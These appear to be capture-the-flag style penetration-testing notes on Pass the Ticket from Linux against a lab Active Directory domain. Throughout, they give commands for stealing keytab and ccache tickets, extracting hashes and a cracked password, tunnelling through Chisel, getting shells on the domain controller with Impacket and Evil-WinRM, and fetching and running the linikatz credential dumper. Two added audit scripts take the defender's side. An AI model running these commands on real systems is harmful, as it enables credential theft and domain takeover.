
# Pass the Ticket from Linux (PtT)

### Overview

Linux machines connected to Active Directory use Kerberos for authentication. If you compromise one, you can steal Kerberos tickets and impersonate other users — no password needed.

> **Note:** A Linux machine does NOT need to be domain-joined to use Kerberos tickets. Tickets can be used in scripts or for network auth on any Linux box with a Kerberos client installed.

***

### How Linux Stores Kerberos Tickets

Two storage methods exist on Linux:

| Type            | Purpose                       | Location                          | Lifetime                |
| --------------- | ----------------------------- | --------------------------------- | ----------------------- |
| **ccache file** | Active session credentials    | `/tmp/krb5cc_<UID>_<random>`      | Session-based (~24hrs)  |
| **keytab file** | Automated script/service auth | `/etc/krb5.keytab`, `/opt/`, etc. | Permanent until rotated |

#### ccache Files

* Holds TGT + service tickets for active user sessions
* Location stored in environment variable `KRB5CCNAME`
* Protected by `rw-------` (600) permissions — only owner or root can read
* Automatically created when user authenticates to domain

```bash
# Check your current ccache location
env | grep -i krb5
# KRB5CCNAME=FILE:/tmp/krb5cc_647402606_qd2Pfh
```

#### keytab Files

* Contains Kerberos principal + encrypted keys derived from the password
* Used by scripts/services to authenticate without a password prompt
* **Must be recreated every time the account password changes**
* Can be created on one machine and copied to another — not system-restricted

> **Note:** To use a keytab file, you need read AND write (`rw`) permissions on it.

***

### Step 1 — Identify if Linux Machine is Domain-Joined

#### Method 1: `realm`

```bash
realm list
```

**Output:**

```
inlanefreight.htb
  type: kerberos
  realm-name: INLANEFREIGHT.HTB
  domain-name: inlanefreight.htb
  configured: kerberos-member
  server-software: active-directory
  client-software: sssd
  login-formats: %U@inlanefreight.htb
  login-policy: allow-permitted-logins
  permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
  permitted-groups: Linux Admins
```

**What to look for:**

* `type: kerberos` or `type: active-directory`
* `configured: kerberos-member`
* Permitted users and groups — these are your targets

#### Method 2: Check for AD Integration Services

```bash
ps -ef | grep -i "winbind\|sssd"
```

**Common services indicating domain join:**

* `sssd` — System Security Services Daemon (most common)
* `winbind` — part of Samba stack

***

### Step 2 — Find Kerberos Tickets

#### Finding KeyTab Files

**Search by name**

```bash
find / -name "*keytab*" -ls 2>/dev/null   # quote the glob so the shell does not expand it in the current directory
```

**Example output:**

```
131610  4 -rw-------  1 root  root  1348 Oct  4 16:26 /etc/krb5.keytab
262169  4 -rw-rw-rw-  1 root  root   216 Oct 12 15:13 /opt/specialfiles/carlos.keytab
```

**Common locations:**

* `/etc/krb5.keytab` — machine account keytab (root only)
* `/home/user/.keytab` — user personal keytab
* `/opt/specialfiles/*.keytab` — shared service keytabs

**Search in cron jobs (keytabs without `.keytab` extension)**

```bash
crontab -l
cat /home/user/.scripts/somescript.sh
```

**Example cron script revealing a keytab:**

```bash
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass
```

> **Note:** If you find `/etc/krb5.keytab` and gain root, you can impersonate the machine account `LINUX01$@INLANEFREIGHT.HTB`
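The two findings above (a keytab left world-readable under `/opt/specialfiles`, and a keytab without the `.keytab` extension that is only visible because a cron script loads it with `kinit -k -t`) are exactly what a host audit should catch before an attacker does. The script below is an added example, not code from the original page: it defines two checks, `find_weak_keytabs` (keytab-like files whose mode grants read to group or other, i.e. anything looser than `600`) and `find_kinit_refs` (scripts that call `kinit` with `-t`), and runs them against a constructed sandbox tree so it can be executed offline. The file names, the realm `EXAMPLE.REALM` and the sandbox layout are all made up for the demonstration.

```bash
#!/usr/bin/env bash
# Added example: audit a filesystem tree for keytab exposure.
#   1. keytab-like files readable by group or other (mode looser than 600)
#   2. scripts that load a keytab via "kinit ... -t" (reveals keytabs stored
#      without the .keytab extension, as in the cron example above)

# find_weak_keytabs ROOT: print files named *keytab* or *.kt under ROOT whose
# mode has the group-read (040) or other-read (004) bit set.
# "-perm -MODE" matches when all bits of MODE are set on the file.
find_weak_keytabs() {
    find "$1" -type f \( -name '*keytab*' -o -name '*.kt' \) \
        \( -perm -040 -o -perm -004 \) 2>/dev/null
}

# find_kinit_refs ROOT: print files under ROOT that contain a kinit call
# naming a keytab with -t (cron jobs and service scripts are the usual place).
find_kinit_refs() {
    grep -rlE 'kinit .* -t ' "$1" 2>/dev/null
}

# --- constructed sandbox so the checks can be demonstrated offline ---------
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
mkdir -p "$SANDBOX/etc" "$SANDBOX/opt/specialfiles" "$SANDBOX/home/carlos/.scripts"

# machine keytab with the correct mode: should NOT be reported
printf 'constructed keytab bytes' > "$SANDBOX/etc/krb5.keytab"
chmod 600 "$SANDBOX/etc/krb5.keytab"

# world-readable user keytab (the 666 case from the find output above)
printf 'constructed keytab bytes' > "$SANDBOX/opt/specialfiles/carlos.keytab"
chmod 666 "$SANDBOX/opt/specialfiles/carlos.keytab"

# keytab without the .keytab extension, group-readable
printf 'constructed keytab bytes' > "$SANDBOX/home/carlos/.scripts/svc_workstations.kt"
chmod 640 "$SANDBOX/home/carlos/.scripts/svc_workstations.kt"

# script that reveals the .kt keytab through its kinit call (constructed)
cat > "$SANDBOX/home/carlos/.scripts/backup.sh" <<'EOF'
#!/bin/bash
kinit svc_workstations@EXAMPLE.REALM -k -t /home/carlos/.scripts/svc_workstations.kt
EOF

echo "[*] keytabs readable beyond their owner:"
find_weak_keytabs "$SANDBOX"
echo "[*] scripts that load a keytab with kinit:"
find_kinit_refs "$SANDBOX"
```

On a real host the same functions are run against `/` (as root, so that permission checks are not skewed by what the auditing user may read); every hit from the first check is a keytab whose mode should be tightened to `600`, and every hit from the second is a script whose keytab path should be added to the inventory of credential files to rotate when the account password changes.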

#### Finding ccache Files

```bash
# Check env variable
env | grep -i krb5

# List all ccache files in /tmp
ls -la /tmp
```

**Example output:**

```
-rw-------  1 julio@inlanefreight.htb   domain users  1406 Oct  6 16:38 krb5cc_647401106_tBswau
-rw-------  1 david@inlanefreight.htb   domain users  1406 Oct  6 15:23 krb5cc_647401107_Gf415d
-rw-------  1 carlos@inlanefreight.htb  domain users  1433 Oct  6 15:43 krb5cc_647402606_qd2Pfh
```

> **Requires root or elevated privileges to read other users' ccache files**

***

### Step 3a — Abuse KeyTab Files

#### Method 1: Impersonate User with `kinit`

**Step 1: Check which user the keytab belongs to**

```bash
klist -k -t /opt/specialfiles/carlos.keytab
```

**Output:**

```
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp           Principal
---- ------------------- ----------------------------------------
   1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
```

**Step 2: Check your current ticket**

```bash
klist
# Default principal: david@INLANEFREIGHT.HTB
```

**Step 3: Import keytab into your session**

```bash
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
```

> **Note:** `kinit` is case-sensitive — use the principal name exactly as shown in `klist` output (lowercase username, uppercase domain)

**Step 4: Verify impersonation**

```bash
klist
# Default principal: carlos@INLANEFREIGHT.HTB  ← you're now Carlos
```

**Step 5: Use the ticket**

```bash
smbclient //dc01/carlos -k -c ls
```

> **Tip:** Before importing a keytab, save a copy of your current ccache file if you want to switch back. `KRB5CCNAME` usually carries a `FILE:` prefix that `cp` does not understand, so strip it first:
>
> ```bash
> cp "${KRB5CCNAME#FILE:}" /tmp/backup_ticket
> ```

***

#### Method 2: Extract Hashes from KeyTab (Password Cracking)

Keytab files contain encrypted key material. You can extract NTLM and AES hashes and crack them.

**Extract hashes:**

```bash
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
```

**Output:**

```
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : INLANEFREIGHT.HTB
        SERVICE PRINCIPAL : carlos/
        NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
        AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
        AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
```

**Crack options:**

* NTLM hash → Hashcat, John the Ripper, or crackstation.net (fastest)
* AES256/AES128 → Use with Rubeus to forge tickets, or crack for plaintext

**Log in with cracked password:**

```bash
su - carlos@inlanefreight.htb
# Password: Password5
```

> **Note:** A keytab file can contain multiple users' credentials merged together.

***

### Step 3b — Abuse ccache Files

Requires root access on the machine.

#### Full Attack Chain: ccache → Domain Admin

**Step 1: Escalate to root**

```bash
# If svc_workstations has sudo ALL:
sudo -l
sudo su
whoami  # root
```

**Step 2: List ccache files and identify high-value targets**

```bash
ls -la /tmp
```

**Step 3: Identify the target user's group membership**

```bash
id julio@inlanefreight.htb
# groups: domain admins@inlanefreight.htb  ← jackpot
```

**Step 4: Import the ccache ticket**

```bash
cp /tmp/krb5cc_647401106_HRJDux /root/
export KRB5CCNAME=/root/krb5cc_647401106_HRJDux
```

**Step 5: Verify the ticket**

```bash
klist
# Default principal: julio@INLANEFREIGHT.HTB
# Valid starting: 10/07/2022 13:25:01
# Expires:        10/07/2022 23:25:01   ← check this isn't expired
```

**Step 6: Access DC resources**

```bash
smbclient //dc01/C$ -k -c ls --no-pass
# Full C: drive of Domain Controller — you're in
```

> **Important:** Check the `Valid starting` and `Expires` timestamps. Expired ccache tickets are useless.
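Checking `Valid starting` and `Expires` by eye works for one cache, but a defender reviewing `/tmp` on a shared Linux host wants the same test applied to every `krb5cc_*` file (stale caches are clutter, live caches for privileged accounts are the real exposure). The block below is an added example, not code from the original page: `tgt_expiry` pulls the TGT expiry out of `klist` output, `ticket_expired` compares it with a reference time, and `audit_caches` runs `klist -c` over a directory. The `klist` text it is demonstrated on is constructed from the values shown above; the timestamps are compared in local time, which is what `klist` prints.

```bash
#!/usr/bin/env bash
# Added example: decide from klist output whether a cache's TGT has expired.

# tgt_expiry KLIST_TEXT: print the TGT expiry as YYYYMMDDHHMMSS (a sortable number).
# The ticket table line reads: start_date start_time expiry_date expiry_time principal
tgt_expiry() {
    printf '%s\n' "$1" | awk '
        /krbtgt\// {
            split($3, d, "/"); split($4, t, ":")      # d = MM DD YYYY, t = HH MM SS
            printf "%s%s%s%s%s%s\n", d[3], d[1], d[2], t[1], t[2], t[3]
            exit
        }'
}

# ticket_expired KLIST_TEXT [NOW]: return 0 if the TGT expiry is at or before NOW,
# 1 if it is still valid, 2 if no TGT line was found. NOW defaults to the current
# local time in the same YYYYMMDDHHMMSS form.
ticket_expired() {
    local expiry now
    expiry=$(tgt_expiry "$1")
    now=${2:-$(date +%Y%m%d%H%M%S)}
    [ -n "$expiry" ] || return 2
    [ "$expiry" -le "$now" ]
}

# audit_caches DIR: classify every krb5cc_* file under DIR (needs klist installed
# and enough privilege to read the caches, i.e. root).
audit_caches() {
    local f rc
    for f in "$1"/krb5cc_*; do
        [ -f "$f" ] || continue
        rc=0
        ticket_expired "$(klist -c "$f" 2>/dev/null)" || rc=$?
        case $rc in
            0) echo "EXPIRED  $f" ;;
            1) echo "VALID    $f" ;;
            *) echo "UNKNOWN  $f (no TGT line; is klist installed and the file readable?)" ;;
        esac
    done
}

# Constructed klist output, using the principal and timestamps from this section.
SAMPLE_KLIST='Ticket cache: FILE:/tmp/krb5cc_647401106_HRJDux
Default principal: julio@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
10/07/2022 13:25:01  10/07/2022 23:25:01  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 10/08/2022 13:25:01'

echo "TGT expires at: $(tgt_expiry "$SAMPLE_KLIST")"
if ticket_expired "$SAMPLE_KLIST"; then
    echo "sample ticket: expired"
else
    echo "sample ticket: still valid"
fi
```

`audit_caches /tmp` is the call to make on a real host; the sample above is only there so the parser can be exercised without a KDC.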

***

### Step 4 — Use Stolen Tickets with Attack Tools (From External Host)

If attacking from a machine **not** on the domain, you need to tunnel traffic first.

#### Setup: Proxychains + Chisel Tunnel

**Step 1: Configure `/etc/hosts`**

```bash
cat /etc/hosts
# 172.16.1.10  inlanefreight.htb  dc01.inlanefreight.htb  dc01
# 172.16.1.5   ms01.inlanefreight.htb  ms01
```

**Step 2: Configure `/etc/proxychains.conf`**

```
[ProxyList]
socks5 127.0.0.1 1080
```

**Step 3: Start Chisel server on attack host**

```bash
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
gzip -d chisel_1.7.7_linux_amd64.gz
mv chisel_* chisel && chmod +x ./chisel
sudo ./chisel server --reverse
```

**Step 4: Connect Chisel client on MS01 (Windows)**

```cmd
c:\tools\chisel.exe client 10.10.14.33:8080 R:socks
```

**Step 5: Set the stolen ticket**

```bash
export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133
```

***

#### Tool 1: Impacket

```bash
proxychains impacket-wmiexec dc01 -k
# C:\> whoami
# inlanefreight\julio
```

> **Note:** Use machine hostname (`dc01`), NOT the IP address. Use `-no-pass` if prompted for password.

> **Note:** If on a domain-joined Linux machine, strip `FILE:` prefix from `KRB5CCNAME`:
>
> ```bash
> export KRB5CCNAME=/tmp/krb5cc_647401106_HRJDux  # no FILE: prefix
> ```

***

#### Tool 2: Evil-WinRM

**Step 1: Install Kerberos package**

```bash
sudo apt-get install krb5-user -y
# When prompted:
# Default realm: INLANEFREIGHT.HTB
# KDC: DC01
```

**Step 2: Configure `/etc/krb5.conf`**

```ini
[libdefaults]
    default_realm = INLANEFREIGHT.HTB

[realms]
    INLANEFREIGHT.HTB = {
        kdc = dc01.inlanefreight.htb
    }
```

**Step 3: Connect**

```bash
proxychains evil-winrm -i dc01 -r inlanefreight.htb
# *Evil-WinRM* PS C:\Users\julio\Documents> whoami
# inlanefreight\julio
```

***

### Ticket Conversion — Linux ↔ Windows

Convert ccache (Linux) to kirbi (Windows) and vice versa using Impacket.

#### Linux ccache → Windows kirbi

```bash
impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi
# [*] converting ccache to kirbi...
# [+] done
```

#### Use kirbi on Windows with Rubeus

```cmd
C:\tools\Rubeus.exe ptt /ticket:c:\tools\julio.kirbi
REM [+] Ticket successfully imported!

klist
REM Client: julio @ INLANEFREIGHT.HTB

dir \\dc01\julio
REM Successfully lists directory as Julio
```

#### Windows kirbi → Linux ccache

```bash
impacket-ticketConverter julio.kirbi krb5cc_julio
export KRB5CCNAME=/root/krb5cc_julio
```

***

### Linikatz — Automated Credential Extraction

Linikatz is the Linux equivalent of Mimikatz. It automatically extracts all Kerberos credentials from SSSD, FreeIPA, Samba, Vintela, PBIS, and more.

**Requires root.**

```bash
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh -O /opt/linikatz.sh
chmod +x /opt/linikatz.sh
/opt/linikatz.sh
```

**What it finds:**

* All ccache files (user and machine tickets)
* All keytab files
* Cached hashes from SSSD
* Samba machine secrets and hashes
* KCM Kerberos tickets

**Output location:** Creates a folder named `linikatz.<random>` with all extracted credentials in ccache and keytab formats — ready to use directly.

***

### Full Attack Path Summary

```
1. SSH into compromised Linux machine (domain-joined)
   ↓
2. realm list / ps -ef | grep sssd  →  Confirm domain join
   ↓
3. find / -name *keytab* / ls /tmp  →  Find tickets
   ↓
4a. KEYTAB PATH:
    klist -k -t <file>              →  Identify principal
    kinit user@DOMAIN -k -t <file>  →  Import ticket
    OR
    keytabextract.py <file>         →  Extract NTLM hash → crack → su - user
   ↓
4b. CCACHE PATH (needs root):
    sudo su                         →  Get root
    id target@domain                →  Check if Domain Admin
    cp /tmp/krb5cc_* .              →  Copy their ticket
    export KRB5CCNAME=<path>        →  Load ticket
   ↓
5. smbclient //dc01/C$ -k          →  Access DC
   OR
   impacket-wmiexec dc01 -k        →  Shell on DC
   OR
   evil-winrm -i dc01 -r DOMAIN    →  WinRM shell on DC
   ↓
6. OPTIONAL: impacket-ticketConverter → use on Windows with Rubeus
   OPTIONAL: linikatz.sh           → dump everything at once
```

***

### Quick Reference — All Commands

```bash
# Identify domain join
realm list
ps -ef | grep -i "winbind\|sssd"

# Find tickets
find / -name "*keytab*" -ls 2>/dev/null
ls -la /tmp
env | grep -i krb5
crontab -l

# Inspect tickets
klist                                         # current session ticket
klist -k -t /path/to/file.keytab             # inspect keytab

# Impersonate via keytab
kinit user@DOMAIN.HTB -k -t /path/to/file.keytab
klist                                         # verify

# Extract hashes from keytab
python3 keytabextract.py /path/to/file.keytab

# Use ccache ticket
cp /tmp/krb5cc_XXXXXXX /root/
export KRB5CCNAME=/root/krb5cc_XXXXXXX
klist

# Access resources
smbclient //dc01/share -k -c ls
smbclient //dc01/C$ -k -c ls --no-pass

# Impacket with Kerberos
export KRB5CCNAME=/path/to/ticket
proxychains impacket-wmiexec dc01 -k -no-pass

# Evil-WinRM with Kerberos
proxychains evil-winrm -i dc01 -r INLANEFREIGHT.HTB

# Ticket conversion
impacket-ticketConverter krb5cc_file output.kirbi    # Linux → Windows
impacket-ticketConverter file.kirbi output_ccache    # Windows → Linux

# Linikatz (automated dump, needs root)
/opt/linikatz.sh
```

***

### Non-Domain-Joined Linux with Kerberos

A Linux machine does **NOT** need to be formally domain-joined to have Kerberos tickets.

**Scenario:** A standalone Linux server runs backup scripts that authenticate to a Windows file share using a Kerberos keytab.

#### Detection

```bash
# Domain-joined machines return output from these:
realm list
ps -ef | grep sssd

# Non-domain-joined standalone Kerberos machines return NOTHING above
# But look for:
which kinit
which klist
find / -name "*keytab*" -ls 2>/dev/null
grep -r "kinit" /home /opt /var/scripts 2>/dev/null
```

**Example: a standalone keytab is used exactly like a domain-joined one**

```bash
find / -name "*keytab*" -ls 2>/dev/null
klist -k -t /opt/backup.keytab
kinit svc_backup@INLANEFREIGHT.HTB -k -t /opt/backup.keytab
smbclient //dc01/backup$ -k -c ls
```

### Key Notes

> Always use **hostname not IP** with Kerberos tools — tickets are bound to hostnames

> Always check `klist` expiry time — expired ticket = wasted time

> `kinit` is **case-sensitive** — match principal exactly as shown in `klist -k -t`

> If `KRB5CCNAME` has `FILE:` prefix on domain-joined Linux, strip it before using Impacket

> ccache files are temporary — act fast, they expire in ~24hrs

> keytab → `kinit` impersonates user in current shell only. Won't affect other sessions.

> `svc_workstations` having `sudo ALL` → `sudo su` → root → access all ccache files is a very common CPTS-style chain
